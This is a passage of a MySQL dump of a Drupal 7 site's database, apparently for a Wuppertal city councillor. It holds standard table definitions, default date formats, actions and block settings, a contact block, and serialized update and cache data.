Bartik\";s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:16:\"_info_file_ctime\";i:1445543617;}s:9:\"datestamp\";s:10:\"1413392482\";s:8:\"includes\";a:1:{s:17:\"responsive_bartik\";s:17:\"Responsive Bartik\";}s:12:\"project_type\";s:5:\"theme\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}s:16:\"existing_version\";s:7:\"7.x-1.0\";s:14:\"existing_major\";s:1:\"1\";s:12:\"install_type\";s:8:\"official\";s:5:\"title\";s:20:\"Responsive Bartik D7\";s:4:\"link\";s:48:\"https://www.drupal.org/project/responsive_bartik\";s:14:\"latest_version\";s:7:\"7.x-1.0\";s:8:\"releases\";a:1:{s:7:\"7.x-1.0\";a:13:{s:4:\"name\";s:25:\"responsive_bartik 7.x-1.0\";s:7:\"version\";s:7:\"7.x-1.0\";s:3:\"tag\";s:7:\"7.x-1.0\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2357299\";s:13:\"download_link\";s:69:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.0.tar.gz\";s:4:\"date\";s:10:\"1413390828\";s:6:\"mdhash\";s:32:\"c75d57de70d0103aaa2860b086241796\";s:8:\"filesize\";s:5:\"62962\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}}s:11:\"recommended\";s:7:\"7.x-1.0\";s:6:\"status\";i:5;}}',1451362583,1451358983,1),('update_project_projects','a:3:{s:7:\"adsense\";a:8:{s:4:\"name\";s:7:\"adsense\";s:4:\"info\";a:6:{s:4:\"name\";s:12:\"AdSense core\";s:7:\"package\";s:7:\"Adsense\";s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:16:\"_info_file_ctime\";i:1445543617;}s:9:\"datestamp\";s:10:\"1407429229\";s:8:\"includes\";a:5:{s:7:\"adsense\";s:12:\"AdSense core\";s:13:\"adsense_click\";s:22:\"AdSense Click Tracking\";s:11:\"adsense_cse\";s:10:\"CSE Search\";s:15:\"adsense_managed\";s:11:\"Managed ads\";s:15:\"adsense_oldcode\";s:9:\"Ads (old)\";}s:12:\"project_type\";s:6:\"module\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}}s:6:\"drupal\";a:8:{s:4:\"name\";s:6:\"drupal\";s:4:\"info\";a:6:{s:4:\"name\";s:5:\"Block\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:16:\"_info_file_ctime\";i:1445543533;}s:9:\"datestamp\";s:10:\"1445457729\";s:8:\"includes\";a:35:{s:5:\"block\";s:5:\"Block\";s:4:\"blog\";s:4:\"Blog\";s:5:\"color\";s:5:\"Color\";s:7:\"comment\";s:7:\"Comment\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contextual\";s:16:\"Contextual links\";s:9:\"dashboard\";s:9:\"Dashboard\";s:5:\"dblog\";s:16:\"Database logging\";s:5:\"field\";s:5:\"Field\";s:17:\"field_sql_storage\";s:17:\"Field SQL storage\";s:8:\"field_ui\";s:8:\"Field UI\";s:4:\"file\";s:4:\"File\";s:6:\"filter\";s:6:\"Filter\";s:4:\"help\";s:4:\"Help\";s:5:\"image\";s:5:\"Image\";s:4:\"list\";s:4:\"List\";s:4:\"menu\";s:4:\"Menu\";s:4:\"node\";s:4:\"Node\";s:6:\"number\";s:6:\"Number\";s:7:\"options\";s:7:\"Options\";s:7:\"overlay\";s:7:\"Overlay\";s:4:\"path\";s:4:\"Path\";s:3:\"php\";s:10:\"PHP filter\";s:3:\"rdf\";s:3:\"RDF\";s:6:\"search\";s:6:\"Search\";s:8:\"shortcut\";s:8:\"Shortcut\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"system\";s:6:\"System\";s:8:\"taxonomy\";s:8:\"Taxonomy\";s:4:\"text\";s:4:\"Text\";s:7:\"toolbar\";s:7:\"Toolbar\";s:6:\"update\";s:14:\"Update manager\";s:4:\"user\";s:4:\"User\";s:6:\"bartik\";s:6:\"Bartik\";s:5:\"seven\";s:5:\"Seven\";}s:12:\"project_type\";s:4:\"core\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}}s:17:\"responsive_bartik\";a:8:{s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"info\";a:5:{s:4:\"name\";s:17:\"Responsive Bartik\";s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:16:\"_info_file_ctime\";i:1445543617;}s:9:\"datestamp\";s:10:\"1413392482\";s:8:\"includes\";a:1:{s:17:\"responsive_bartik\";s:17:\"Responsive Bartik\";}s:12:\"project_type\";s:5:\"theme\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}}}',1451362583,1451358983,1); /*!40000 ALTER TABLE `cache_update` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `comment` -- DROP TABLE IF EXISTS `comment`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `comment` ( `cid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique comment ID.', `pid` int(11) NOT NULL DEFAULT '0' COMMENT 'The comment.cid to which this comment is a reply. If set to 0, this comment is not a reply to an existing comment.', `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The node.nid to which this comment is a reply.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The users.uid who authored the comment. If set to 0, this comment was created by an anonymous user.', `subject` varchar(64) NOT NULL DEFAULT '' COMMENT 'The comment title.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'The author’s host name.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The time that the comment was created, as a Unix timestamp.', `changed` int(11) NOT NULL DEFAULT '0' COMMENT 'The time that the comment was last edited, as a Unix timestamp.', `status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT 'The published status of a comment. (0 = Not Published, 1 = Published)', `thread` varchar(255) NOT NULL COMMENT 'The vancode representation of the comment’s place in a thread.', `name` varchar(60) DEFAULT NULL COMMENT 'The comment author’s name. Uses users.name if the user is logged in, otherwise uses the value typed into the comment form.', `mail` varchar(64) DEFAULT NULL COMMENT 'The comment author’s e-mail address from the comment form, if user is anonymous, and the ’Anonymous users may/must leave their contact information’ setting is turned on.', `homepage` varchar(255) DEFAULT NULL COMMENT 'The comment author’s home page address from the comment form, if user is anonymous, and the ’Anonymous users may/must leave their contact information’ setting is turned on.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The languages.language of this comment.', PRIMARY KEY (`cid`), KEY `comment_status_pid` (`pid`,`status`), KEY `comment_num_new` (`nid`,`status`,`created`,`cid`,`thread`), KEY `comment_uid` (`uid`), KEY `comment_nid_language` (`nid`,`language`), KEY `comment_created` (`created`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores comments and associated data.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `comment` -- LOCK TABLES `comment` WRITE; /*!40000 ALTER TABLE `comment` DISABLE KEYS */; /*!40000 ALTER TABLE `comment` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `contact` -- DROP TABLE IF EXISTS `contact`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `contact` ( `cid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique category ID.', `category` varchar(255) NOT NULL DEFAULT '' COMMENT 'Category name.', `recipients` longtext NOT NULL COMMENT 'Comma-separated list of recipient e-mail addresses.', `reply` longtext NOT NULL COMMENT 'Text of the auto-reply message.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The category’s weight.', `selected` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate whether or not category is selected by default. (1 = Yes, 0 = No)', PRIMARY KEY (`cid`), UNIQUE KEY `category` (`category`), KEY `list` (`weight`,`category`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Contact form category settings.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `contact` -- LOCK TABLES `contact` WRITE; /*!40000 ALTER TABLE `contact` DISABLE KEYS */; INSERT INTO `contact` VALUES (1,'Website feedback','piratolli@ollital.de','',0,1); /*!40000 ALTER TABLE `contact` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `date_format_locale` -- DROP TABLE IF EXISTS `date_format_locale`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `date_format_locale` ( `format` varchar(100) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The date format string.', `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `language` varchar(12) NOT NULL COMMENT 'A languages.language for this format to be used with.', PRIMARY KEY (`type`,`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configured date formats for each locale.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `date_format_locale` -- LOCK TABLES `date_format_locale` WRITE; /*!40000 ALTER TABLE `date_format_locale` DISABLE KEYS */; /*!40000 ALTER TABLE `date_format_locale` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `date_format_type` -- DROP TABLE IF EXISTS `date_format_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `date_format_type` ( `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `title` varchar(255) NOT NULL COMMENT 'The human readable name of the format type.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether or not this is a system provided format.', PRIMARY KEY (`type`), KEY `title` (`title`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configured date format types.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `date_format_type` -- LOCK TABLES `date_format_type` WRITE; /*!40000 ALTER TABLE `date_format_type` DISABLE KEYS */; INSERT INTO `date_format_type` VALUES ('long','Long',1),('medium','Medium',1),('short','Short',1); /*!40000 ALTER TABLE `date_format_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `date_formats` -- DROP TABLE IF EXISTS `date_formats`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `date_formats` ( `dfid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The date format identifier.', `format` varchar(100) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The date format string.', `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether or not this format can be modified.', PRIMARY KEY (`dfid`), UNIQUE KEY `formats` (`format`,`type`) ) ENGINE=InnoDB AUTO_INCREMENT=36 DEFAULT CHARSET=utf8 COMMENT='Stores configured date formats.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `date_formats` -- LOCK TABLES `date_formats` WRITE; /*!40000 ALTER TABLE `date_formats` DISABLE KEYS */; INSERT INTO `date_formats` VALUES (1,'Y-m-d H:i','short',1),(2,'m/d/Y - H:i','short',1),(3,'d/m/Y - H:i','short',1),(4,'Y/m/d - H:i','short',1),(5,'d.m.Y - H:i','short',1),(6,'m/d/Y - g:ia','short',1),(7,'d/m/Y - g:ia','short',1),(8,'Y/m/d - g:ia','short',1),(9,'M j Y - H:i','short',1),(10,'j M Y - H:i','short',1),(11,'Y M j - H:i','short',1),(12,'M j Y - g:ia','short',1),(13,'j M Y - g:ia','short',1),(14,'Y M j - g:ia','short',1),(15,'D, Y-m-d H:i','medium',1),(16,'D, m/d/Y - H:i','medium',1),(17,'D, d/m/Y - H:i','medium',1),(18,'D, Y/m/d - H:i','medium',1),(19,'F j, Y - H:i','medium',1),(20,'j F, Y - H:i','medium',1),(21,'Y, F j - H:i','medium',1),(22,'D, m/d/Y - g:ia','medium',1),(23,'D, d/m/Y - g:ia','medium',1),(24,'D, Y/m/d - g:ia','medium',1),(25,'F j, Y - g:ia','medium',1),(26,'j F Y - g:ia','medium',1),(27,'Y, F j - g:ia','medium',1),(28,'j. F Y - G:i','medium',1),(29,'l, F j, Y - H:i','long',1),(30,'l, j F, Y - H:i','long',1),(31,'l, Y, F j - H:i','long',1),(32,'l, F j, Y - g:ia','long',1),(33,'l, j F Y - g:ia','long',1),(34,'l, Y, F j - g:ia','long',1),(35,'l, j. F Y - G:i','long',1); /*!40000 ALTER TABLE `date_formats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_accesslog` -- DROP TABLE IF EXISTS `dpl_accesslog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_accesslog` ( `aid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique accesslog ID.', `sid` varchar(128) NOT NULL DEFAULT '' COMMENT 'Browser session ID of user that visited page.', `title` varchar(255) DEFAULT NULL COMMENT 'Title of page visited.', `path` varchar(255) DEFAULT NULL COMMENT 'Internal path to page visited (relative to Drupal root.)', `url` text COMMENT 'Referrer URI.', `hostname` varchar(128) DEFAULT NULL COMMENT 'Hostname of user that visited the page.', `uid` int(10) unsigned DEFAULT '0' COMMENT 'User dpl_users.uid that visited the page.', `timer` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Time in milliseconds that the page took to load.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Timestamp of when the page was visited.', PRIMARY KEY (`aid`), KEY `accesslog_timestamp` (`timestamp`), KEY `uid` (`uid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores site access information for statistics.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_accesslog` -- LOCK TABLES `dpl_accesslog` WRITE; /*!40000 ALTER TABLE `dpl_accesslog` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_accesslog` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_actions` -- DROP TABLE IF EXISTS `dpl_actions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_actions` ( `aid` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Primary Key: Unique actions ID.', `type` varchar(32) NOT NULL DEFAULT '' COMMENT 'The object that that action acts on (node, user, comment, system or custom types.)', `callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The callback function that executes when the action runs.', `parameters` longblob NOT NULL COMMENT 'Parameters to be passed to the callback function.', `label` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Label of the action.', PRIMARY KEY (`aid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores action information.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_actions` -- LOCK TABLES `dpl_actions` WRITE; /*!40000 ALTER TABLE `dpl_actions` DISABLE KEYS */; INSERT INTO `dpl_actions` VALUES ('comment_publish_action','comment','comment_publish_action','','Publish comment'),('comment_save_action','comment','comment_save_action','','Save comment'),('comment_unpublish_action','comment','comment_unpublish_action','','Unpublish comment'),('node_make_sticky_action','node','node_make_sticky_action','','Make content sticky'),('node_make_unsticky_action','node','node_make_unsticky_action','','Make content unsticky'),('node_promote_action','node','node_promote_action','','Promote content to front page'),('node_publish_action','node','node_publish_action','','Publish content'),('node_save_action','node','node_save_action','','Save content'),('node_unpromote_action','node','node_unpromote_action','','Remove content from front page'),('node_unpublish_action','node','node_unpublish_action','','Unpublish content'),('system_block_ip_action','user','system_block_ip_action','','Ban IP address of current user'),('user_block_user_action','user','user_block_user_action','','Block current user'); /*!40000 ALTER TABLE `dpl_actions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_authmap` -- DROP TABLE IF EXISTS `dpl_authmap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_authmap` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique authmap ID.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'User’s dpl_users.uid.', `authname` varchar(128) NOT NULL DEFAULT '' COMMENT 'Unique authentication name.', `module` varchar(128) NOT NULL DEFAULT '' COMMENT 'Module which is controlling the authentication.', PRIMARY KEY (`aid`), UNIQUE KEY `authname` (`authname`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores distributed authentication mapping.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_authmap` -- LOCK TABLES `dpl_authmap` WRITE; /*!40000 ALTER TABLE `dpl_authmap` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_authmap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_batch` -- DROP TABLE IF EXISTS `dpl_batch`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_batch` ( `bid` int(10) unsigned NOT NULL COMMENT 'Primary Key: Unique batch ID.', `token` varchar(64) NOT NULL COMMENT 'A string token generated against the current user’s session id and the batch id, used to ensure that only the user who submitted the batch can effectively access it.', `timestamp` int(11) NOT NULL COMMENT 'A Unix timestamp indicating when this batch was submitted for processing. Stale batches are purged at cron time.', `batch` longblob COMMENT 'A serialized array containing the processing data for the batch.', PRIMARY KEY (`bid`), KEY `token` (`token`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores details about batches (processes that run in...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_batch` -- LOCK TABLES `dpl_batch` WRITE; /*!40000 ALTER TABLE `dpl_batch` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_batch` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_block` -- DROP TABLE IF EXISTS `dpl_block`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_block` ( `bid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique block ID.', `module` varchar(64) NOT NULL DEFAULT '' COMMENT 'The module from which the block originates; for example, ’user’ for the Who’s Online block, and ’block’ for any custom blocks.', `delta` varchar(32) NOT NULL DEFAULT '0' COMMENT 'Unique ID for block within a module.', `theme` varchar(64) NOT NULL DEFAULT '' COMMENT 'The theme under which the block settings apply.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Block enabled status. (1 = enabled, 0 = disabled)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Block weight within region.', `region` varchar(64) NOT NULL DEFAULT '' COMMENT 'Theme region within which the block is set.', `custom` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate how users may control visibility of the block. (0 = Users cannot control, 1 = On by default, but can be hidden, 2 = Hidden by default, but can be shown)', `visibility` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate how to show blocks on pages. (0 = Show on all pages except listed pages, 1 = Show only on listed pages, 2 = Use custom PHP code to determine visibility)', `pages` text NOT NULL COMMENT 'Contents of the "Pages" block; contains either a list of paths on which to include/exclude the block or PHP code, depending on "visibility" setting.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'Custom title for the block. (Empty string will use block default title, will remove the title, text will cause block to use specified title.)', `cache` tinyint(4) NOT NULL DEFAULT '1' COMMENT 'Binary flag to indicate block cache mode. (-2: Custom cache, -1: Do not cache, 1: Cache per role, 2: Cache per user, 4: Cache per page, 8: Block cache global) See DRUPAL_CACHE_* constants in ../includes/common.inc for more detailed information.', PRIMARY KEY (`bid`), UNIQUE KEY `tmd` (`theme`,`module`,`delta`), KEY `list` (`theme`,`status`,`region`,`weight`,`module`) ) ENGINE=InnoDB AUTO_INCREMENT=33 DEFAULT CHARSET=utf8 COMMENT='Stores block settings, such as region and visibility...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_block` -- LOCK TABLES `dpl_block` WRITE; /*!40000 ALTER TABLE `dpl_block` DISABLE KEYS */; INSERT INTO `dpl_block` VALUES (1,'system','main','bartik',1,0,'content',0,0,'','',-1),(2,'search','form','bartik',1,-1,'sidebar_first',0,0,'','',-1),(3,'node','recent','seven',1,10,'dashboard_main',0,0,'','',-1),(4,'user','login','bartik',1,0,'sidebar_first',0,0,'','',-1),(5,'system','navigation','bartik',1,0,'sidebar_first',0,0,'','',-1),(6,'system','powered-by','bartik',1,10,'footer',0,0,'','',-1),(7,'system','help','bartik',1,0,'help',0,0,'','',-1),(8,'system','main','seven',1,0,'content',0,0,'','',-1),(9,'system','help','seven',1,0,'help',0,0,'','',-1),(10,'user','login','seven',1,10,'content',0,0,'','',-1),(11,'user','new','seven',1,0,'dashboard_sidebar',0,0,'','',-1),(12,'search','form','seven',1,-10,'dashboard_sidebar',0,0,'','',-1),(13,'comment','recent','bartik',0,0,'-1',0,0,'','',1),(14,'node','syndicate','bartik',0,0,'-1',0,0,'','',-1),(15,'node','recent','bartik',0,0,'-1',0,0,'','',1),(16,'shortcut','shortcuts','bartik',0,0,'-1',0,0,'','',-1),(17,'system','management','bartik',0,0,'-1',0,0,'','',-1),(18,'system','user-menu','bartik',0,0,'-1',0,0,'','',-1),(19,'system','main-menu','bartik',0,0,'-1',0,0,'','',-1),(20,'user','new','bartik',0,0,'-1',0,0,'','',1),(21,'user','online','bartik',0,0,'-1',0,0,'','',-1),(22,'comment','recent','seven',1,0,'dashboard_inactive',0,0,'','',1),(23,'node','syndicate','seven',0,0,'-1',0,0,'','',-1),(24,'shortcut','shortcuts','seven',0,0,'-1',0,0,'','',-1),(25,'system','powered-by','seven',0,10,'-1',0,0,'','',-1),(26,'system','navigation','seven',0,0,'-1',0,0,'','',-1),(27,'system','management','seven',0,0,'-1',0,0,'','',-1),(28,'system','user-menu','seven',0,0,'-1',0,0,'','',-1),(29,'system','main-menu','seven',0,0,'-1',0,0,'','',-1),(30,'user','online','seven',1,0,'dashboard_inactive',0,0,'','',-1),(31,'block','1','bartik',1,0,'sidebar_second',0,0,'','Kontakt',-1),(32,'block','1','seven',0,0,'-1',0,0,'','Kontakt',-1); /*!40000 ALTER TABLE `dpl_block` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_block_custom` -- DROP TABLE IF EXISTS `dpl_block_custom`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_block_custom` ( `bid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The block’s dpl_block.bid.', `body` longtext COMMENT 'Block contents.', `info` varchar(128) NOT NULL DEFAULT '' COMMENT 'Block description.', `format` varchar(255) DEFAULT NULL COMMENT 'The dpl_filter_format.format of the block body.', PRIMARY KEY (`bid`), UNIQUE KEY `info` (`info`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Stores contents of custom-made blocks.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_block_custom` -- LOCK TABLES `dpl_block_custom` WRITE; /*!40000 ALTER TABLE `dpl_block_custom` DISABLE KEYS */; INSERT INTO `dpl_block_custom` VALUES (1,'Stadtverordneter\r\nOliver Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\neMail: ollirat@ollital.de\r\nTwitter: @OlliTal','Kontaktdaten','filtered_html'); /*!40000 ALTER TABLE `dpl_block_custom` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_block_node_type` -- DROP TABLE IF EXISTS `dpl_block_node_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_block_node_type` ( `module` varchar(64) NOT NULL COMMENT 'The block’s origin module, from dpl_block.module.', `delta` varchar(32) NOT NULL COMMENT 'The block’s unique delta within module, from dpl_block.delta.', `type` varchar(32) NOT NULL COMMENT 'The machine-readable name of this type from dpl_node_type.type.', PRIMARY KEY (`module`,`delta`,`type`), KEY `type` (`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sets up display criteria for blocks based on content types'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_block_node_type` -- LOCK TABLES `dpl_block_node_type` WRITE; /*!40000 ALTER TABLE `dpl_block_node_type` DISABLE KEYS */; INSERT INTO `dpl_block_node_type` VALUES ('search','form','page'); /*!40000 ALTER TABLE `dpl_block_node_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_block_role` -- DROP TABLE IF EXISTS `dpl_block_role`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_block_role` ( `module` varchar(64) NOT NULL COMMENT 'The block’s origin module, from dpl_block.module.', `delta` varchar(32) NOT NULL COMMENT 'The block’s unique delta within module, from dpl_block.delta.', `rid` int(10) unsigned NOT NULL COMMENT 'The user’s role ID from dpl_users_roles.rid.', PRIMARY KEY (`module`,`delta`,`rid`), KEY `rid` (`rid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sets up access permissions for blocks based on user roles'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_block_role` -- LOCK TABLES `dpl_block_role` WRITE; /*!40000 ALTER TABLE `dpl_block_role` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_block_role` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_blocked_ips` -- DROP TABLE IF EXISTS `dpl_blocked_ips`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_blocked_ips` ( `iid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: unique ID for IP addresses.', `ip` varchar(40) NOT NULL DEFAULT '' COMMENT 'IP address', PRIMARY KEY (`iid`), KEY `blocked_ip` (`ip`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores blocked IP addresses.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_blocked_ips` -- LOCK TABLES `dpl_blocked_ips` WRITE; /*!40000 ALTER TABLE `dpl_blocked_ips` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_blocked_ips` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_cache` -- DROP TABLE IF EXISTS `dpl_cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_cache` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Generic cache table for caching things not separated out...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_cache` -- LOCK TABLES `dpl_cache` WRITE; /*!40000 ALTER TABLE `dpl_cache` DISABLE KEYS */; INSERT INTO `dpl_cache` VALUES ('entity_info:en','a:6:{s:7:\"comment\";a:13:{s:5:\"label\";s:7:\"Comment\";s:10:\"base table\";s:7:\"comment\";s:12:\"uri callback\";s:11:\"comment_uri\";s:9:\"fieldable\";b:1;s:16:\"controller class\";s:17:\"CommentController\";s:11:\"entity keys\";a:5:{s:2:\"id\";s:3:\"cid\";s:6:\"bundle\";s:9:\"node_type\";s:5:\"label\";s:7:\"subject\";s:8:\"language\";s:8:\"language\";s:8:\"revision\";s:0:\"\";}s:7:\"bundles\";a:2:{s:20:\"comment_node_article\";a:4:{s:5:\"label\";s:15:\"Article comment\";s:11:\"node bundle\";s:7:\"article\";s:5:\"admin\";a:4:{s:4:\"path\";s:55:\"admin/structure/types/manage/%comment_node_type/comment\";s:15:\"bundle argument\";i:4;s:9:\"real path\";s:44:\"admin/structure/types/manage/article/comment\";s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content 